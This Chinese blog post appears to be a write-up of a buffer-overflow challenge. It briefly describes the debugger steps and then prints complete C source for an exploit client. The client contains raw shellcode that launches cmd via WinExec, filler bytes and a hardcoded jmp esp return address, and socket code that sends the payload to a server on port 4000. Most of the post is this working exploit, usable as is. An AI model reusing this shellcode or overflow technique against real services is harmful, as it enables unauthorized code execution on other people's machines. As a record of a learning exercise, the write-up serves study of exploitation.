win7下测试成功,不过服务端程序会引发一个异常,奔溃,不会完美退出进程:

img

虚拟机下截图:

img

od载入,断到溢出点retn 0x4

img

retun 到 jmp esp

img

retun到填充的push eax和jmp esp

img

retn到shellcode头,也就是我们发送的攻击字串头,执行打开cmd的shellcode

img

成功溢出,开了一个新的cmd,在题目的目录下。

img

期待户振江同学的文章。贴上第三关的vc源码(shellcode在xp sp3的虚拟机下测试成功):

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108

//cmd下需要服务器的ip地址参数 127.0.0.1
#include <stdio.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment(lib,"Ws2_32")
#define PORT 4000                            /* 客户机连接远程主机的端口 */ 
#define MAXDATASIZE 100                     /* 每次可以接收的最大字节 */ 
int main(int argc, char *argv[]) 
{ 
    BYTE szChat[] = {
    //cmd shellcode
       0xfc, 0x33, 0xd2, 0xb2, 0x30, 0x64, 0xff, 0x32, 0x5a, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,
       0x72, 0x28, 0x33, 0xc9, 0xb1, 0x18, 0x33, 0xff, 0x33, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c,
       0x20, 0xc1, 0xcf, 0x0d, 0x03, 0xf8, 0xe2, 0xf0, 0x81, 0xff, 0x5b, 0xbc, 0x4a, 0x6a, 0x8b, 0x5a,
       0x10, 0x8b, 0x12, 0x75, 0xda, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0xff, 0x72, 0x34, 0x8b, 0x52, 0x78,
       0x03, 0xd3, 0x8b, 0x72, 0x20, 0x03, 0xf3, 0x33, 0xc9, 0x41, 0xad, 0x03, 0xc3, 0x81, 0x38, 0x47,
       0x65, 0x74, 0x50, 0x75, 0xf4, 0x81, 0x78, 0x04, 0x72, 0x6f, 0x63, 0x41, 0x75, 0xeb, 0x81, 0x78,
       0x08, 0x64, 0x64, 0x72, 0x65, 0x75, 0xe2, 0x49, 0x8b, 0x72, 0x24, 0x03, 0xf3, 0x66, 0x8b, 0x0c,
       0x4e, 0x8b, 0x72, 0x1c, 0x03, 0xf3, 0x8b, 0x14, 0x8e, 0x03, 0xd3, 0x52, 0x68, 0x78, 0x65, 0x63,
       0x01, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x57, 0x69, 0x6e, 0x45, 0x54, 0x53, 0xff, 0xd2, 0x68, 0x63,
       0x6d, 0x64, 0x01, 0xfe, 0x4c, 0x24, 0x03, 0x6a, 0x05, 0x33, 0xc9, 0x8d, 0x4c, 0x24, 0x04, 0x51,
       0xff, 0xd0, 0x68, 0x65, 0x73, 0x73, 0x01, 0x8b, 0xdf, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x50, 0x72,
       0x6f, 0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x54, 0xff, 0x74, 0x24, 0x20, 0xff, 0x54, 0x24, 0x20,
       0x57, 0xff, 0xd0, 
       //垃圾字节
        0xB8,0xDB,0xA1,0xA3,0xCE,0xD2,0xB5,0xC4,0xD7,0xCB,0xC8,0xDD,0xB7,0xE7,0xBB,0xAA,0xBE,0xF8,0xB4,0xFA,
        0xA3,0xAC,0xCE,0xD2,0xB5,0xC4,0xD0,0xA6,0xC3,0xB2,0xBF,0xF5,0xCA,0xC0,0xBE,0xF8,0xB3,0xBE,0xA1,0xA3,
        0xB7,0xBA,0xD4,0xDA,0xB4,0xBD,0xBC,0xE4,0xB5,0xC4,0xC3,0xDB,0xD0,0xA6,0xA3,0xAC,0xC8,0xB4,0xD4,0xF5,
        0xC3,0xB4,0xD2,0xB2,0xB2,0xBB,0xD4,0xB8,0xD2,0xE2,0xD0,0xD1,0xC0,0xB4,0xA1,0xA3,0xB6,0xE0,0xC3,0xB4,
        0xD0,0xD2,0xB8,0xA3,0xB5,0xC4,0xCA,0xB1,0xBF,0xCC,0xA3,0xA1,0xCE,0xC7,0xA3,0xAC,0xCC,0xF0,0xC3,0xDB,
        0xB5,0xD8,0xC7,0xE3,0xD0,0xBA,0xCF,0xC2,0xC0,0xB4,0xA3,0xBA,0xB6,0xEE,0xC9,0xCF,0xA1,0xA2,0xD1,0xDB,
        0xC1,0xB1,0xA1,0xA2,0xB1,0xC7,0xBC,0xE2,0xA1,0xA2,0xC3,0xB5,0xB9,0xE5,0xB5,0xC4,0xB4,0xBD,0xA1,0xA3,
        0xC4,0xC7,0xBC,0xA4,0xB6,0xAF,0xB5,0xC4,0xA1,0xA2,0xB2,0xFC,0xB6,0xB6,0xB5,0xC4,0xA1,0xA2,0xBB,0xC5,
        0xC2,0xD2,0xB5,0xC4,0xA3,0xAC,0xB3,0xC9,0xB3,0xA4,0xD2,0xD4,0xC0,0xB4,0xB5,0xC4,0xC3,0xCE,0xCF,0xEB,
        0xD3,0xEB,0xC5,0xCE,0xCD,0xFB,0xA3,0xAC,0xCE,0xD2,0xCA,0xD6,0xD7,0xE3,0xCE,0xDE,0xB4,0xEB,0xA3,0xA1,
        0xBE,0xCD,0xD4,0xDA,0xBA,0xF4,0xCE,0xFC,0xD3,0xEB,0xB4,0xA5,0xBE,0xF5,0xC6,0xB5,0xC1,0xD9,0xBE,0xF8,
        0xBE,0xB3,0xB5,0xC4,0xCA,0xB1,0xBA,0xF2,0xA3,0xAC,0xD2,0xC0,0xCF,0xA1,0xB8,0xD0,0xBE,0xF5,0xC4,0xB0,
        0xC9,0xFA,0xA3,0xBA,0xCB,0xFB,0xB1,0xA6,0xCA,0xAF,0xB0,0xE3,0xB5,0xC4,0xED,0xF8,0xD7,0xD3,0xA3,0xAC,
        0xC6,0xCB,0xF3,0xF9,0xC3,0xD4,0xC0,0xEB,0xB5,0xC4,0xD1,0xDB,0xC9,0xF1,0xA3,0xAC,0xBD,0xC6,0xF7,0xEF,
        0xCE,0xA2,0xD1,0xEF,0xB5,0xC4,0xD7,0xEC,0xBD,0xC7,0xA3,0xAC,0xC7,0xE5,0xC7,0xB3,0xF7,0xC8,0xBB,0xF3,
        0xB5,0xC4,0xD0,0xA6,0xC8,0xDD,0xA1,0xA3,0xCE,0xD2,0xB5,0xC4,0xCD,0xF5,0xD7,0xD3,0xC4,0xD8,0xA3,0xBF,
        0xBB,0xCC,0xBB,0xF3,0xA1,0xA2,0xBE,0xAA,0xBA,0xF4,0xA1,0xA2,0xD5,0xF5,0xD4,0xFA,0xA1,0xAD,0xA1,0xAD,
        0xD2,0xBB,0xC7,0xD0,0xC0,0xB4,0xB5,0xC3,0xC4,0xC7,0xC3,0xB4,0xCD,0xBB,0xC8,0xBB,0xA3,0xA1,0xD4,0xDA,
        0xCE,0xDE,0xCA,0xFD,0xB5,0xC4,0xC3,0xCE,0xCF,0xEB,0xD6,0xD0,0xA3,0xAC,0xCE,0xD2,0xB6,0xBC,0xCA,0xC7,
        0xBE,0xF8,0xC3,0xC0,0xB5,0xC4,0xD7,0xCB,0xCC,0xAC,0xA3,0xAC,0xB3,0xF6,0xCF,0xD6,0xD4,0xDA,0xB0,0xAE,
        0xC7,0xE9,0xD6,0xAE,0xC7,0xB0,0xA1,0xA3,0xD5,0xE6,0xB5,0xC4,0xB2,0xBB,0xD6,0xAA,0xB5,0xC0,0xC3,0xFC,
        0xD4,0xCB,0xA3,0xAC,0xCE,0xAA,0xCA,0xB2,0xC3,0xB4,0xC8,0xE7,0xB4,0xCB,0xB2,0xBB,0xBF,0xB0,0xA1,0xA3,
        0xCB,0xD5,0xD0,0xD1,0xB5,0xC4,0xCA,0xB1,0xBA,0xF2,0xA3,0xAC,0xB0,0xB2,0xD4,0xDA,0xC4,0xB0,0xC9,0xFA,
        0xB5,0xC4,0xBE,0xB3,0xB5,0xD8,0xA3,0xAC,0xEB,0xFC,0xEB,0xCA,0xC6,0xAE,0xB7,0xF7,0xB5,0xC4,0xC1,0xB1,
        0xE1,0xA3,0xA3,0xAC,0xC3,0xD4,0xC0,0xEB,0xE4,0xD6,0xC8,0xBE,0xD7,0xC5,0xB4,0xBC,0xCF,0xE3,0xA1,0xA3,
        0xB7,0xC2,0xB7,0xF0,0xD3,0xD0,0xB8,0xF6,0xC9,0xF9,0xD2,0xF4,0xBA,0xF4,0xBB,0xBD,0xD7,0xC5,0xA3,0xAC,
        0xD4,0xD3,0xC2,0xD2,0xCB,0xF6,0xCB,0xE9,0xB5,0xC4,0xBD,0xC5,0xB2,0xBD,0xC9,0xF9,0xA3,0xAC,0xBB,0xCE,
        0xB6,0xAF,0xCE,0xDE,0xCA,0xFD,0xBB,0xB6,0xD4,0xC3,0xB5,0xC4,0xC1,0xB3,0xA1,0xAD,0xA1,0xAD,0xB8,0xD0,
        0xBE,0xF5,0xA3,0xAC,0xD2,0xC0,0xBE,0xC9,0xC8,0xE1,0xC8,0xED,0xCE,0xDE,0xC1,0xA6,0xA3,0xAC,0xC8,0xE7,
        0xCD,0xAC,0xB4,0xB9,0xCB,0xC0,0xD5,0xF5,0xD4,0xFA,0xA3,0xA1,0xC4,0xB3,0xD0,0xA9,0xD6,0xAD,0xD2,0xBA,
        0xD4,0xDA,0xB4,0xBD,0xBC,0xE4,0xD3,0xCE,0xB6,0xAF,0xA3,0xAC,0xCB,0xE1,0xCB,0xE1,0xCC,0xF0,0xCC,0xF0,
        0xC9,0xAC,0xC9,0xAC,0xB5,0xC4,0xA3,0xAC,0xC9,0xF8,0xCD,0xB8,0xD7,0xC5,0xD7,0xED,0xC8,0xCB,0xB5,0xC4,
        0xB7,0xD2,0xB7,0xBC,0xA1,0xA3,0xD2,0xE2,0xCA,0xB6,0xBB,0xBA,0xBB,0xBA,0xC7,0xE5,0xD0,0xD1,0xB9,0xFD,
        0xC0,0xB4,0xC1,0xCB,0xA3,0xAC,0xB2,0xBB,0xD6,0xAA,0xCA,0xB2,0xC3,0xB4,0xCA,0xB1,0xBA,0xF2,0xB0,0xB2,
        0xBE,0xB2,0xC1,0xCB,0xA3,0xAC,0xC4,0xC7,0xD0,0xA9,0xA1,0xB0,0xC1,0xB3,0xC5,0xD3,0xA1,0xB1,0xB2,0xBB,
        0xBC,0xFB,0xC1,0xCB,0xA1,0xA3,0xBB,0xBB,0xB6,0xF8,0xB4,0xFA,0xD6,0xAE,0xA3,0xAC,0xCB,0xC6,0xD4,0xF8,
        0xCF,0xE0,0xCA,0xB6,0xA3,0xBA,0xCB,0xFB,0xC4,0xC7,0xC0,0xF5,0xBD,0xF0,0xC9,0xAB,0xB5,0xC4,0xB7,0xA2,
        0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,
        0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,
        0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,0xC4,0xB8,0xDF,0xD4,0xC6,   
        //到这里填充字节结束      
        
        //下面是jmp esp    这里esp会返回到4个字节后,因为是retn 0x4      
        0x12,0x45,0xFA,0x7F,   //栈区,retn处的4个字节
        //垃圾字节 byte
        0x61,0x61,0x61,0x61,
        // push eax   
        // jmp [esp]   这俩句跳到缓冲区开头
        0x50, 0xff, 0x24, 0x24,
    };
//socket
int sockfd, numbytes; 
char buf[MAXDATASIZE]; 
struct sockaddr_in their_addr;        /* 对方的地址端口信息 */ 
if (argc != 2) 
{ 
           //需要有服务端ip参数
           fprintf(stderr,"usage: client hostname\n"); 
           exit(1); 
} 
 WSADATA ws;
WSAStartup(MAKEWORD(2,2),&ws);         //初始化Windows Socket Dll
 if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{ 
           //如果建立socket失败,退出程序
           printf("socket error\n"); 
           exit(1); 
} 
//连接对方
their_addr.sin_family = AF_INET;                         /* 协议类型是INET  */ 
their_addr.sin_port = htons(PORT);                       /* 连接对方PORT端口 */ 
their_addr.sin_addr.s_addr = inet_addr(argv[1]);        /* 连接对方的IP */ 
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1)
{ 
           //如果连接失败,退出程序
           printf("connet error\n"); 
           closesocket(sockfd); 
           exit(1); 
} 
send(sockfd, (PCHAR)szChat, sizeof(szChat),0); //发送攻击字符串
closesocket(sockfd); 
return 0; 
}